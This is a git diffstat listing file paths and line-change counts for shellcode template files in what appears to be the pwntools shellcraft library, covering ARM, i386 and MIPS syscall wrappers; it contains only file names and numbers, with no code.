.../shellcraft/templates/arm/linux/getgid.asm | 13 + .../templates/arm/linux/getgroups.asm | 14 + .../templates/arm/linux/getitimer.asm | 14 + .../templates/arm/linux/getpeername.asm | 15 + .../templates/arm/linux/getpgid.asm | 13 + .../templates/arm/linux/getpgrp.asm | 13 + .../shellcraft/templates/arm/linux/getpid.asm | 13 + .../templates/arm/linux/getpmsg.asm | 17 + .../templates/arm/linux/getppid.asm | 13 + .../templates/arm/linux/getpriority.asm | 14 + .../templates/arm/linux/getresgid.asm | 15 + .../templates/arm/linux/getresuid.asm | 15 + .../templates/arm/linux/getrlimit.asm | 14 + .../templates/arm/linux/getrusage.asm | 14 + .../shellcraft/templates/arm/linux/getsid.asm | 13 + .../templates/arm/linux/getsockname.asm | 15 + .../templates/arm/linux/getsockopt.asm | 17 + .../templates/arm/linux/gettimeofday.asm | 14 + .../shellcraft/templates/arm/linux/getuid.asm | 13 + .../shellcraft/templates/arm/linux/gtty.asm | 14 + .../shellcraft/templates/arm/linux/ioctl.asm | 15 + .../shellcraft/templates/arm/linux/ioperm.asm | 15 + .../shellcraft/templates/arm/linux/iopl.asm | 13 + .../shellcraft/templates/arm/linux/kill.asm | 14 + .../templates/arm/linux/killparent.asm | 17 + .../shellcraft/templates/arm/linux/lchown.asm | 15 + .../shellcraft/templates/arm/linux/link.asm | 14 + .../shellcraft/templates/arm/linux/linkat.asm | 17 + .../shellcraft/templates/arm/linux/listen.asm | 14 + .../shellcraft/templates/arm/linux/lseek.asm | 15 + .../shellcraft/templates/arm/linux/lstat.asm | 14 + .../templates/arm/linux/lstat64.asm | 14 + .../templates/arm/linux/madvise.asm | 15 + .../templates/arm/linux/mincore.asm | 15 + .../shellcraft/templates/arm/linux/mkdir.asm | 14 + .../templates/arm/linux/mkdirat.asm | 15 + .../shellcraft/templates/arm/linux/mknod.asm | 15 + .../templates/arm/linux/mknodat.asm | 16 + .../shellcraft/templates/arm/linux/mlock.asm | 14 + .../templates/arm/linux/mlockall.asm | 13 + .../shellcraft/templates/arm/linux/mmap.asm | 18 + 
.../templates/arm/linux/mprotect.asm | 15 + .../templates/arm/linux/mq_notify.asm | 14 + .../templates/arm/linux/mq_open.asm | 15 + .../templates/arm/linux/mq_timedreceive.asm | 17 + .../templates/arm/linux/mq_timedsend.asm | 17 + .../templates/arm/linux/mq_unlink.asm | 13 + .../shellcraft/templates/arm/linux/mremap.asm | 17 + .../shellcraft/templates/arm/linux/msync.asm | 15 + .../templates/arm/linux/munlock.asm | 14 + .../templates/arm/linux/munlockall.asm | 13 + .../shellcraft/templates/arm/linux/munmap.asm | 14 + .../templates/arm/linux/nanosleep.asm | 14 + .../shellcraft/templates/arm/linux/nice.asm | 13 + .../shellcraft/templates/arm/linux/open.asm | 15 + .../shellcraft/templates/arm/linux/openat.asm | 16 + .../shellcraft/templates/arm/linux/pause.asm | 13 + .../shellcraft/templates/arm/linux/pipe.asm | 13 + .../shellcraft/templates/arm/linux/pipe2.asm | 14 + .../shellcraft/templates/arm/linux/poll.asm | 15 + .../shellcraft/templates/arm/linux/ppoll.asm | 16 + .../shellcraft/templates/arm/linux/prctl.asm | 14 + .../shellcraft/templates/arm/linux/pread.asm | 16 + .../shellcraft/templates/arm/linux/preadv.asm | 16 + .../templates/arm/linux/prlimit64.asm | 16 + .../shellcraft/templates/arm/linux/profil.asm | 16 + .../shellcraft/templates/arm/linux/ptrace.asm | 14 + .../templates/arm/linux/putpmsg.asm | 17 + .../shellcraft/templates/arm/linux/pwrite.asm | 16 + .../templates/arm/linux/pwritev.asm | 16 + .../templates/arm/linux/readahead.asm | 15 + .../templates/arm/linux/readdir.asm | 13 + .../templates/arm/linux/readlink.asm | 15 + .../templates/arm/linux/readlinkat.asm | 16 + .../shellcraft/templates/arm/linux/readv.asm | 15 + .../shellcraft/templates/arm/linux/recv.asm | 16 + .../templates/arm/linux/recvfrom.asm | 18 + .../templates/arm/linux/recvmmsg.asm | 17 + .../templates/arm/linux/recvmsg.asm | 15 + .../templates/arm/linux/remap_file_pages.asm | 17 + .../shellcraft/templates/arm/linux/rename.asm | 14 + .../templates/arm/linux/renameat.asm | 16 + 
.../shellcraft/templates/arm/linux/rmdir.asm | 13 + .../arm/linux/sched_get_priority_max.asm | 13 + .../arm/linux/sched_get_priority_min.asm | 13 + .../templates/arm/linux/sched_getaffinity.asm | 15 + .../templates/arm/linux/sched_getparam.asm | 14 + .../arm/linux/sched_getscheduler.asm | 13 + .../arm/linux/sched_rr_get_interval.asm | 14 + .../templates/arm/linux/sched_setaffinity.asm | 15 + .../templates/arm/linux/sched_setparam.asm | 14 + .../arm/linux/sched_setscheduler.asm | 15 + .../templates/arm/linux/sched_yield.asm | 13 + .../shellcraft/templates/arm/linux/select.asm | 17 + .../templates/arm/linux/sendfile.asm | 16 + .../templates/arm/linux/sendfile64.asm | 16 + .../templates/arm/linux/setdomainname.asm | 14 + .../shellcraft/templates/arm/linux/setgid.asm | 13 + .../templates/arm/linux/setgroups.asm | 14 + .../templates/arm/linux/sethostname.asm | 14 + .../templates/arm/linux/setitimer.asm | 15 + .../templates/arm/linux/setpgid.asm | 14 + .../templates/arm/linux/setpriority.asm | 15 + .../templates/arm/linux/setregid.asm | 14 + .../templates/arm/linux/setresgid.asm | 15 + .../templates/arm/linux/setresuid.asm | 15 + .../templates/arm/linux/setreuid.asm | 14 + .../templates/arm/linux/setrlimit.asm | 14 + .../shellcraft/templates/arm/linux/setsid.asm | 13 + .../templates/arm/linux/setsockopt.asm | 18 + .../arm/linux/setsockopt_timeout.asm | 21 + .../templates/arm/linux/settimeofday.asm | 14 + .../shellcraft/templates/arm/linux/setuid.asm | 13 + pwnlib/shellcraft/templates/arm/linux/sh.asm | 16 +- .../templates/arm/linux/sigaction.asm | 15 + .../templates/arm/linux/sigaltstack.asm | 14 + .../shellcraft/templates/arm/linux/signal.asm | 14 + .../templates/arm/linux/sigpending.asm | 13 + .../templates/arm/linux/sigprocmask.asm | 15 + .../templates/arm/linux/sigreturn.asm | 11 +- .../templates/arm/linux/sigsuspend.asm | 13 + .../shellcraft/templates/arm/linux/splice.asm | 18 + .../shellcraft/templates/arm/linux/stat.asm | 14 + 
.../shellcraft/templates/arm/linux/stat64.asm | 14 + .../shellcraft/templates/arm/linux/stime.asm | 13 + .../shellcraft/templates/arm/linux/stty.asm | 14 + .../templates/arm/linux/symlink.asm | 14 + .../templates/arm/linux/symlinkat.asm | 15 + .../shellcraft/templates/arm/linux/sync.asm | 13 + .../templates/arm/linux/sync_file_range.asm | 16 + .../templates/arm/linux/syscall.asm | 43 +- .../shellcraft/templates/arm/linux/syslog.asm | 15 + pwnlib/shellcraft/templates/arm/linux/tee.asm | 16 + .../shellcraft/templates/arm/linux/time.asm | 13 + .../templates/arm/linux/timer_create.asm | 15 + .../templates/arm/linux/timer_delete.asm | 13 + .../templates/arm/linux/timer_getoverrun.asm | 13 + .../templates/arm/linux/timer_gettime.asm | 14 + .../templates/arm/linux/timer_settime.asm | 16 + .../templates/arm/linux/truncate.asm | 14 + .../templates/arm/linux/truncate64.asm | 14 + .../shellcraft/templates/arm/linux/ulimit.asm | 14 + .../shellcraft/templates/arm/linux/umask.asm | 13 + .../shellcraft/templates/arm/linux/uname.asm | 13 + .../shellcraft/templates/arm/linux/unlink.asm | 13 + .../templates/arm/linux/unlinkat.asm | 15 + .../templates/arm/linux/unshare.asm | 13 + .../shellcraft/templates/arm/linux/ustat.asm | 14 + .../shellcraft/templates/arm/linux/utime.asm | 14 + .../templates/arm/linux/utimensat.asm | 16 + .../shellcraft/templates/arm/linux/utimes.asm | 14 + .../shellcraft/templates/arm/linux/vfork.asm | 13 + .../templates/arm/linux/vhangup.asm | 13 + .../templates/arm/linux/vmsplice.asm | 16 + .../shellcraft/templates/arm/linux/wait4.asm | 16 + .../shellcraft/templates/arm/linux/waitid.asm | 16 + .../templates/arm/linux/waitpid.asm | 15 + .../shellcraft/templates/arm/linux/write.asm | 15 + .../shellcraft/templates/arm/linux/writev.asm | 15 + pwnlib/shellcraft/templates/arm/memcpy.asm | 19 + pwnlib/shellcraft/templates/arm/mov.asm | 101 +++- pwnlib/shellcraft/templates/arm/push.asm | 19 +- pwnlib/shellcraft/templates/arm/pushstr.asm | 21 +- 
pwnlib/shellcraft/templates/arm/setregs.asm | 43 ++ pwnlib/shellcraft/templates/arm/to_thumb.asm | 20 +- pwnlib/shellcraft/templates/arm/trap.asm | 8 +- pwnlib/shellcraft/templates/arm/udiv_10.asm | 18 + pwnlib/shellcraft/templates/arm/xor.asm | 67 +++ pwnlib/shellcraft/templates/i386/cgc/__doc__ | 0 .../templates/i386/cgc/allocate.asm | 17 + pwnlib/shellcraft/templates/i386/cgc/cat.asm | 17 + .../templates/i386/cgc/deallocate.asm | 16 + .../shellcraft/templates/i386/cgc/fdwait.asm | 19 + .../shellcraft/templates/i386/cgc/random.asm | 17 + .../shellcraft/templates/i386/cgc/receive.asm | 18 + .../templates/i386/cgc/sendfile.asm | 29 ++ .../shellcraft/templates/i386/cgc/syscall.asm | 42 ++ .../templates/i386/cgc/terminate.asm | 15 + .../templates/i386/cgc/transmit.asm | 18 + pwnlib/shellcraft/templates/i386/crash.asm | 11 + pwnlib/shellcraft/templates/i386/epilog.asm | 14 + .../templates/i386/freebsd/push.asm | 2 +- .../shellcraft/templates/i386/freebsd/sh.asm | 4 +- pwnlib/shellcraft/templates/i386/function.asm | 65 +++ pwnlib/shellcraft/templates/i386/getpc.asm | 12 + pwnlib/shellcraft/templates/i386/itoa.asm | 61 +++ .../templates/i386/linux/accept.asm | 15 + .../templates/i386/linux/access.asm | 14 + .../shellcraft/templates/i386/linux/acct.asm | 13 + .../shellcraft/templates/i386/linux/alarm.asm | 13 + .../shellcraft/templates/i386/linux/bind.asm | 15 + .../shellcraft/templates/i386/linux/brk.asm | 13 + .../shellcraft/templates/i386/linux/chdir.asm | 13 + .../shellcraft/templates/i386/linux/chmod.asm | 14 + .../shellcraft/templates/i386/linux/chown.asm | 15 + .../templates/i386/linux/chroot.asm | 13 + .../templates/i386/linux/clock_getres.asm | 14 + .../templates/i386/linux/clock_gettime.asm | 14 + .../templates/i386/linux/clock_nanosleep.asm | 16 + .../templates/i386/linux/clock_settime.asm | 14 + .../shellcraft/templates/i386/linux/clone.asm | 17 + .../shellcraft/templates/i386/linux/close.asm | 13 + .../templates/i386/linux/connect.asm | 30 +- 
.../shellcraft/templates/i386/linux/creat.asm | 14 + .../shellcraft/templates/i386/linux/dir.asm | 17 + .../shellcraft/templates/i386/linux/dup.asm | 25 +- .../shellcraft/templates/i386/linux/dup2.asm | 14 + .../shellcraft/templates/i386/linux/dup3.asm | 15 + .../shellcraft/templates/i386/linux/dupio.asm | 21 + .../shellcraft/templates/i386/linux/dupsh.asm | 2 +- .../shellcraft/templates/i386/linux/echo.asm | 2 +- .../templates/i386/linux/egghunter.asm | 73 +++ .../templates/i386/linux/epoll_create.asm | 13 + .../templates/i386/linux/epoll_create1.asm | 13 + .../templates/i386/linux/epoll_ctl.asm | 16 + .../templates/i386/linux/epoll_pwait.asm | 17 + .../templates/i386/linux/epoll_wait.asm | 16 + .../templates/i386/linux/execve.asm | 47 ++ .../templates/i386/linux/faccessat.asm | 16 + .../templates/i386/linux/fallocate.asm | 16 + .../templates/i386/linux/fchdir.asm | 13 + .../templates/i386/linux/fchmod.asm | 14 + .../templates/i386/linux/fchmodat.asm | 16 + .../templates/i386/linux/fchown.asm | 15 + .../templates/i386/linux/fchownat.asm | 17 + .../shellcraft/templates/i386/linux/fcntl.asm | 15 + .../templates/i386/linux/fdatasync.asm | 13 + .../shellcraft/templates/i386/linux/flock.asm | 14 + .../shellcraft/templates/i386/linux/fork.asm | 13 + .../templates/i386/linux/forkbomb.asm | 13 + .../templates/i386/linux/forkexit.asm | 16 + .../shellcraft/templates/i386/linux/fstat.asm | 14 + .../templates/i386/linux/fstat64.asm | 14 + .../templates/i386/linux/fstatat64.asm | 16 + .../shellcraft/templates/i386/linux/fsync.asm | 13 + .../templates/i386/linux/ftruncate.asm | 14 + .../templates/i386/linux/ftruncate64.asm | 14 + .../templates/i386/linux/futimesat.asm | 15 + .../templates/i386/linux/getcwd.asm | 14 + .../templates/i386/linux/getdents.asm | 33 +- .../templates/i386/linux/getegid.asm | 13 + .../templates/i386/linux/geteuid.asm | 13 + .../templates/i386/linux/getgid.asm | 13 + .../templates/i386/linux/getgroups.asm | 14 + .../templates/i386/linux/getitimer.asm | 
14 + .../templates/i386/linux/getpeername.asm | 15 + .../templates/i386/linux/getpgid.asm | 13 + .../templates/i386/linux/getpgrp.asm | 13 + .../templates/i386/linux/getpid.asm | 13 + .../templates/i386/linux/getpmsg.asm | 17 + .../templates/i386/linux/getppid.asm | 13 + .../templates/i386/linux/getpriority.asm | 14 + .../templates/i386/linux/getresgid.asm | 15 + .../templates/i386/linux/getresuid.asm | 15 + .../templates/i386/linux/getrlimit.asm | 14 + .../templates/i386/linux/getrusage.asm | 14 + .../templates/i386/linux/getsid.asm | 13 + .../templates/i386/linux/getsockname.asm | 15 + .../templates/i386/linux/getsockopt.asm | 17 + .../templates/i386/linux/gettimeofday.asm | 14 + .../templates/i386/linux/getuid.asm | 13 + .../shellcraft/templates/i386/linux/gtty.asm | 14 + .../shellcraft/templates/i386/linux/ioctl.asm | 15 + .../templates/i386/linux/ioperm.asm | 15 + .../shellcraft/templates/i386/linux/iopl.asm | 13 + .../shellcraft/templates/i386/linux/kill.asm | 14 + .../templates/i386/linux/killparent.asm | 17 + .../templates/i386/linux/lchown.asm | 15 + .../shellcraft/templates/i386/linux/link.asm | 14 + .../templates/i386/linux/linkat.asm | 17 + .../templates/i386/linux/listen.asm | 14 + .../templates/i386/linux/loader.asm | 173 +++++++ .../templates/i386/linux/loader_append.asm | 55 +++ .../shellcraft/templates/i386/linux/lseek.asm | 15 + .../shellcraft/templates/i386/linux/lstat.asm | 14 + .../templates/i386/linux/lstat64.asm | 14 + .../templates/i386/linux/madvise.asm | 15 + .../templates/i386/linux/mincore.asm | 15 + .../shellcraft/templates/i386/linux/mkdir.asm | 14 + .../templates/i386/linux/mkdirat.asm | 15 + .../shellcraft/templates/i386/linux/mknod.asm | 15 + .../templates/i386/linux/mknodat.asm | 16 + .../shellcraft/templates/i386/linux/mlock.asm | 14 + .../templates/i386/linux/mlockall.asm | 13 + .../shellcraft/templates/i386/linux/mmap.asm | 17 + .../templates/i386/linux/mprotect.asm | 15 + .../templates/i386/linux/mq_notify.asm | 14 + 
.../templates/i386/linux/mq_open.asm | 15 + .../templates/i386/linux/mq_timedreceive.asm | 17 + .../templates/i386/linux/mq_timedsend.asm | 17 + .../templates/i386/linux/mq_unlink.asm | 13 + .../templates/i386/linux/mremap.asm | 17 + .../shellcraft/templates/i386/linux/msync.asm | 15 + .../templates/i386/linux/munlock.asm | 14 + .../templates/i386/linux/munlockall.asm | 13 + .../templates/i386/linux/munmap.asm | 14 + .../templates/i386/linux/nanosleep.asm | 14 + .../shellcraft/templates/i386/linux/nice.asm | 13 + .../shellcraft/templates/i386/linux/open.asm | 15 + .../templates/i386/linux/openat.asm | 16 + .../shellcraft/templates/i386/linux/pause.asm | 13 + .../templates/i386/linux/pidmax.asm | 41 ++ .../shellcraft/templates/i386/linux/pipe.asm | 13 + .../shellcraft/templates/i386/linux/pipe2.asm | 14 + .../shellcraft/templates/i386/linux/poll.asm | 15 + .../shellcraft/templates/i386/linux/ppoll.asm | 16 + .../shellcraft/templates/i386/linux/prctl.asm | 14 + .../shellcraft/templates/i386/linux/pread.asm | 16 + .../templates/i386/linux/preadv.asm | 16 + .../templates/i386/linux/prlimit64.asm | 16 + .../templates/i386/linux/profil.asm | 16 + .../templates/i386/linux/ptrace.asm | 14 + .../shellcraft/templates/i386/linux/push.asm | 2 +- .../templates/i386/linux/putpmsg.asm | 17 + .../templates/i386/linux/pwrite.asm | 16 + .../templates/i386/linux/pwritev.asm | 16 + .../templates/i386/linux/readahead.asm | 15 + .../templates/i386/linux/readdir.asm | 13 + .../templates/i386/linux/readlink.asm | 15 + .../templates/i386/linux/readlinkat.asm | 16 + .../shellcraft/templates/i386/linux/readn.asm | 23 + .../shellcraft/templates/i386/linux/readv.asm | 15 + .../shellcraft/templates/i386/linux/recv.asm | 16 + .../templates/i386/linux/recvfrom.asm | 18 + .../templates/i386/linux/recvmmsg.asm | 17 + .../templates/i386/linux/recvmsg.asm | 15 + .../templates/i386/linux/remap_file_pages.asm | 17 + .../templates/i386/linux/rename.asm | 14 + .../templates/i386/linux/renameat.asm | 16 + 
.../shellcraft/templates/i386/linux/rmdir.asm | 13 + .../i386/linux/sched_get_priority_max.asm | 13 + .../i386/linux/sched_get_priority_min.asm | 13 + .../i386/linux/sched_getaffinity.asm | 15 + .../templates/i386/linux/sched_getparam.asm | 14 + .../i386/linux/sched_getscheduler.asm | 13 + .../i386/linux/sched_rr_get_interval.asm | 14 + .../i386/linux/sched_setaffinity.asm | 15 + .../templates/i386/linux/sched_setparam.asm | 14 + .../i386/linux/sched_setscheduler.asm | 15 + .../templates/i386/linux/sched_yield.asm | 13 + .../templates/i386/linux/select.asm | 17 + .../templates/i386/linux/sendfile.asm | 16 + .../templates/i386/linux/sendfile64.asm | 16 + .../templates/i386/linux/setdomainname.asm | 14 + .../templates/i386/linux/setgid.asm | 13 + .../templates/i386/linux/setgroups.asm | 14 + .../templates/i386/linux/sethostname.asm | 14 + .../templates/i386/linux/setitimer.asm | 15 + .../templates/i386/linux/setpgid.asm | 14 + .../templates/i386/linux/setpriority.asm | 15 + .../templates/i386/linux/setresgid.asm | 15 + .../templates/i386/linux/setresuid.asm | 15 + .../templates/i386/linux/setrlimit.asm | 14 + .../templates/i386/linux/setsid.asm | 13 + .../templates/i386/linux/setsockopt.asm | 24 + .../i386/linux/setsockopt_timeout.asm | 19 + .../templates/i386/linux/settimeofday.asm | 14 + .../templates/i386/linux/setuid.asm | 13 + pwnlib/shellcraft/templates/i386/linux/sh.asm | 11 +- .../templates/i386/linux/sigaction.asm | 15 + .../templates/i386/linux/sigaltstack.asm | 14 + .../templates/i386/linux/signal.asm | 14 + .../templates/i386/linux/sigpending.asm | 13 + .../templates/i386/linux/sigprocmask.asm | 15 + .../templates/i386/linux/sigsuspend.asm | 13 + .../templates/i386/linux/socket.asm | 12 + .../templates/i386/linux/socketcall.asm | 15 + .../templates/i386/linux/splice.asm | 18 + .../shellcraft/templates/i386/linux/stage.asm | 59 +++ .../shellcraft/templates/i386/linux/stat.asm | 14 + .../templates/i386/linux/stat64.asm | 14 + 
.../shellcraft/templates/i386/linux/stime.asm | 13 + .../shellcraft/templates/i386/linux/stty.asm | 14 + .../templates/i386/linux/symlink.asm | 14 + .../templates/i386/linux/symlinkat.asm | 15 + .../shellcraft/templates/i386/linux/sync.asm | 13 + .../templates/i386/linux/sync_file_range.asm | 16 + .../templates/i386/linux/syscall.asm | 20 +- .../templates/i386/linux/syslog.asm | 15 + .../shellcraft/templates/i386/linux/tee.asm | 16 + .../shellcraft/templates/i386/linux/time.asm | 13 + .../templates/i386/linux/timer_create.asm | 15 + .../templates/i386/linux/timer_delete.asm | 13 + .../templates/i386/linux/timer_getoverrun.asm | 13 + .../templates/i386/linux/timer_gettime.asm | 14 + .../templates/i386/linux/timer_settime.asm | 16 + .../templates/i386/linux/truncate.asm | 14 + .../templates/i386/linux/truncate64.asm | 14 + .../templates/i386/linux/ulimit.asm | 14 + .../shellcraft/templates/i386/linux/umask.asm | 13 + .../shellcraft/templates/i386/linux/uname.asm | 13 + .../templates/i386/linux/unlink.asm | 13 + .../templates/i386/linux/unlinkat.asm | 15 + .../templates/i386/linux/unshare.asm | 13 + .../shellcraft/templates/i386/linux/ustat.asm | 14 + .../shellcraft/templates/i386/linux/utime.asm | 14 + .../templates/i386/linux/utimensat.asm | 16 + .../templates/i386/linux/utimes.asm | 14 + .../shellcraft/templates/i386/linux/vfork.asm | 13 + .../templates/i386/linux/vhangup.asm | 13 + .../templates/i386/linux/vmsplice.asm | 16 + .../shellcraft/templates/i386/linux/wait4.asm | 16 + .../templates/i386/linux/waitid.asm | 16 + .../templates/i386/linux/waitpid.asm | 15 + .../templates/i386/linux/writev.asm | 15 + pwnlib/shellcraft/templates/i386/memcpy.asm | 15 + pwnlib/shellcraft/templates/i386/mov.asm | 29 +- pwnlib/shellcraft/templates/i386/prolog.asm | 6 + pwnlib/shellcraft/templates/i386/push.asm | 21 +- pwnlib/shellcraft/templates/i386/pushstr.asm | 21 +- .../templates/i386/pushstr_array.asm | 38 ++ pwnlib/shellcraft/templates/i386/setregs.asm | 7 +- 
pwnlib/shellcraft/templates/i386/stackarg.asm | 13 + pwnlib/shellcraft/templates/i386/strcpy.asm | 28 ++ pwnlib/shellcraft/templates/i386/strlen.asm | 35 ++ pwnlib/shellcraft/templates/i386/xor.asm | 82 ++++ .../templates/mips/linux/accept.asm | 15 + .../templates/mips/linux/access.asm | 14 + .../shellcraft/templates/mips/linux/acct.asm | 13 + .../shellcraft/templates/mips/linux/alarm.asm | 13 + .../shellcraft/templates/mips/linux/bind.asm | 15 + .../shellcraft/templates/mips/linux/brk.asm | 13 + .../shellcraft/templates/mips/linux/cat.asm | 24 + .../shellcraft/templates/mips/linux/chdir.asm | 13 + .../shellcraft/templates/mips/linux/chmod.asm | 14 + .../shellcraft/templates/mips/linux/chown.asm | 15 + .../templates/mips/linux/chroot.asm | 13 + .../templates/mips/linux/clock_getres.asm | 14 + .../templates/mips/linux/clock_gettime.asm | 14 + .../templates/mips/linux/clock_nanosleep.asm | 16 + .../templates/mips/linux/clock_settime.asm | 14 + .../shellcraft/templates/mips/linux/clone.asm | 17 + .../shellcraft/templates/mips/linux/close.asm | 13 + .../templates/mips/linux/connect.asm | 26 + .../shellcraft/templates/mips/linux/creat.asm | 14 + .../shellcraft/templates/mips/linux/dup.asm | 13 + .../shellcraft/templates/mips/linux/dup2.asm | 14 + .../shellcraft/templates/mips/linux/dup3.asm | 15 + .../shellcraft/templates/mips/linux/echo.asm | 6 + .../templates/mips/linux/epoll_create.asm | 13 + .../templates/mips/linux/epoll_create1.asm | 13 + .../templates/mips/linux/epoll_ctl.asm | 16 + .../templates/mips/linux/epoll_pwait.asm | 17 + .../templates/mips/linux/epoll_wait.asm | 16 + .../templates/mips/linux/execve.asm | 15 + .../shellcraft/templates/mips/linux/exit.asm | 13 + .../templates/mips/linux/faccessat.asm | 16 + .../templates/mips/linux/fallocate.asm | 16 + .../templates/mips/linux/fchdir.asm | 13 + .../templates/mips/linux/fchmod.asm | 14 + .../templates/mips/linux/fchmodat.asm | 16 + .../templates/mips/linux/fchown.asm | 15 + 
.../templates/mips/linux/fchownat.asm | 17 + .../shellcraft/templates/mips/linux/fcntl.asm | 15 + .../templates/mips/linux/fdatasync.asm | 13 + .../shellcraft/templates/mips/linux/flock.asm | 14 + .../shellcraft/templates/mips/linux/fork.asm | 13 + .../templates/mips/linux/forkbomb.asm | 15 + .../templates/mips/linux/forkexit.asm | 15 + .../shellcraft/templates/mips/linux/fstat.asm | 14 + .../templates/mips/linux/fstat64.asm | 14 + .../templates/mips/linux/fstatat64.asm | 16 + .../shellcraft/templates/mips/linux/fsync.asm | 13 + .../templates/mips/linux/ftruncate.asm | 14 + .../templates/mips/linux/ftruncate64.asm | 14 + .../templates/mips/linux/futimesat.asm | 15 + .../templates/mips/linux/getcwd.asm | 14 + .../templates/mips/linux/getegid.asm | 13 + .../templates/mips/linux/geteuid.asm | 13 + .../templates/mips/linux/getgid.asm | 13 + .../templates/mips/linux/getgroups.asm | 14 + .../templates/mips/linux/getitimer.asm | 14 + .../templates/mips/linux/getpeername.asm | 15 + .../templates/mips/linux/getpgid.asm | 13 + .../templates/mips/linux/getpgrp.asm | 13 + .../templates/mips/linux/getpid.asm | 13 + .../templates/mips/linux/getpmsg.asm | 17 + .../templates/mips/linux/getppid.asm | 13 + .../templates/mips/linux/getpriority.asm | 14 + .../templates/mips/linux/getresgid.asm | 15 + .../templates/mips/linux/getresuid.asm | 15 + .../templates/mips/linux/getrlimit.asm | 14 + .../templates/mips/linux/getrusage.asm | 14 + .../templates/mips/linux/getsid.asm | 13 + .../templates/mips/linux/getsockname.asm | 15 + .../templates/mips/linux/getsockopt.asm | 17 + .../templates/mips/linux/gettimeofday.asm | 14 + .../templates/mips/linux/getuid.asm | 13 + .../shellcraft/templates/mips/linux/gtty.asm | 14 + .../shellcraft/templates/mips/linux/ioctl.asm | 15 + .../templates/mips/linux/ioperm.asm | 15 + .../shellcraft/templates/mips/linux/iopl.asm | 13 + .../shellcraft/templates/mips/linux/kill.asm | 14 + .../templates/mips/linux/killparent.asm | 16 + 
.../templates/mips/linux/lchown.asm | 15 + .../shellcraft/templates/mips/linux/link.asm | 14 + .../templates/mips/linux/linkat.asm | 17 + .../templates/mips/linux/listen.asm | 14 + .../shellcraft/templates/mips/linux/lseek.asm | 15 + .../shellcraft/templates/mips/linux/lstat.asm | 14 + .../templates/mips/linux/lstat64.asm | 14 + .../templates/mips/linux/madvise.asm | 15 + .../templates/mips/linux/mincore.asm | 15 + .../shellcraft/templates/mips/linux/mkdir.asm | 14 + .../templates/mips/linux/mkdirat.asm | 15 + .../shellcraft/templates/mips/linux/mknod.asm | 15 + .../templates/mips/linux/mknodat.asm | 16 + .../shellcraft/templates/mips/linux/mlock.asm | 14 + .../templates/mips/linux/mlockall.asm | 13 + .../shellcraft/templates/mips/linux/mmap.asm | 18 + .../templates/mips/linux/mprotect.asm | 15 + .../templates/mips/linux/mq_notify.asm | 14 + .../templates/mips/linux/mq_open.asm | 15 + .../templates/mips/linux/mq_timedreceive.asm | 17 + .../templates/mips/linux/mq_timedsend.asm | 17 + .../templates/mips/linux/mq_unlink.asm | 13 + .../templates/mips/linux/mremap.asm | 17 + .../shellcraft/templates/mips/linux/msync.asm | 15 + .../templates/mips/linux/munlock.asm | 14 + .../templates/mips/linux/munlockall.asm | 13 + .../templates/mips/linux/munmap.asm | 14 + .../templates/mips/linux/nanosleep.asm | 14 + .../shellcraft/templates/mips/linux/nice.asm | 13 + .../shellcraft/templates/mips/linux/open.asm | 15 + .../templates/mips/linux/openat.asm | 16 + .../shellcraft/templates/mips/linux/pause.asm | 13 + .../shellcraft/templates/mips/linux/pipe.asm | 13 + .../shellcraft/templates/mips/linux/pipe2.asm | 14 + .../shellcraft/templates/mips/linux/poll.asm | 15 + .../shellcraft/templates/mips/linux/ppoll.asm | 16 + .../shellcraft/templates/mips/linux/prctl.asm | 14 + .../shellcraft/templates/mips/linux/pread.asm | 16 + .../templates/mips/linux/preadv.asm | 16 + .../templates/mips/linux/prlimit64.asm | 16 + .../templates/mips/linux/profil.asm | 16 + 
.../templates/mips/linux/ptrace.asm | 14 + .../templates/mips/linux/putpmsg.asm | 17 + .../templates/mips/linux/pwrite.asm | 16 + .../templates/mips/linux/pwritev.asm | 16 + .../shellcraft/templates/mips/linux/read.asm | 2 +- .../templates/mips/linux/readahead.asm | 15 + .../templates/mips/linux/readdir.asm | 13 + .../templates/mips/linux/readlink.asm | 15 + .../templates/mips/linux/readlinkat.asm | 16 + .../shellcraft/templates/mips/linux/readv.asm | 15 + .../shellcraft/templates/mips/linux/recv.asm | 16 + .../templates/mips/linux/recvfrom.asm | 18 + .../templates/mips/linux/recvmmsg.asm | 17 + .../templates/mips/linux/recvmsg.asm | 15 + .../templates/mips/linux/remap_file_pages.asm | 17 + .../templates/mips/linux/rename.asm | 14 + .../templates/mips/linux/renameat.asm | 16 + .../shellcraft/templates/mips/linux/rmdir.asm | 13 + .../mips/linux/sched_get_priority_max.asm | 13 + .../mips/linux/sched_get_priority_min.asm | 13 + .../mips/linux/sched_getaffinity.asm | 15 + .../templates/mips/linux/sched_getparam.asm | 14 + .../mips/linux/sched_getscheduler.asm | 13 + .../mips/linux/sched_rr_get_interval.asm | 14 + .../mips/linux/sched_setaffinity.asm | 15 + .../templates/mips/linux/sched_setparam.asm | 14 + .../mips/linux/sched_setscheduler.asm | 15 + .../templates/mips/linux/sched_yield.asm | 13 + .../templates/mips/linux/select.asm | 17 + .../templates/mips/linux/sendfile.asm | 16 + .../templates/mips/linux/sendfile64.asm | 16 + .../templates/mips/linux/setdomainname.asm | 14 + .../templates/mips/linux/setgid.asm | 13 + .../templates/mips/linux/setgroups.asm | 14 + .../templates/mips/linux/sethostname.asm | 14 + .../templates/mips/linux/setitimer.asm | 15 + .../templates/mips/linux/setpgid.asm | 14 + .../templates/mips/linux/setpriority.asm | 15 + .../templates/mips/linux/setregid.asm | 14 + .../templates/mips/linux/setresgid.asm | 15 + .../templates/mips/linux/setresuid.asm | 15 + .../templates/mips/linux/setreuid.asm | 14 + .../templates/mips/linux/setrlimit.asm | 
14 + .../templates/mips/linux/setsid.asm | 13 + .../templates/mips/linux/settimeofday.asm | 14 + .../templates/mips/linux/setuid.asm | 13 + pwnlib/shellcraft/templates/mips/linux/sh.asm | 7 + .../templates/mips/linux/sigaction.asm | 15 + .../templates/mips/linux/sigaltstack.asm | 14 + .../templates/mips/linux/signal.asm | 14 + .../templates/mips/linux/sigpending.asm | 13 + .../templates/mips/linux/sigprocmask.asm | 15 + .../templates/mips/linux/sigreturn.asm | 10 +- .../templates/mips/linux/sigsuspend.asm | 13 + .../templates/mips/linux/splice.asm | 18 + .../shellcraft/templates/mips/linux/stat.asm | 14 + .../templates/mips/linux/stat64.asm | 14 + .../shellcraft/templates/mips/linux/stime.asm | 13 + .../shellcraft/templates/mips/linux/stty.asm | 14 + .../templates/mips/linux/symlink.asm | 14 + .../templates/mips/linux/symlinkat.asm | 15 + .../shellcraft/templates/mips/linux/sync.asm | 13 + .../templates/mips/linux/sync_file_range.asm | 16 + 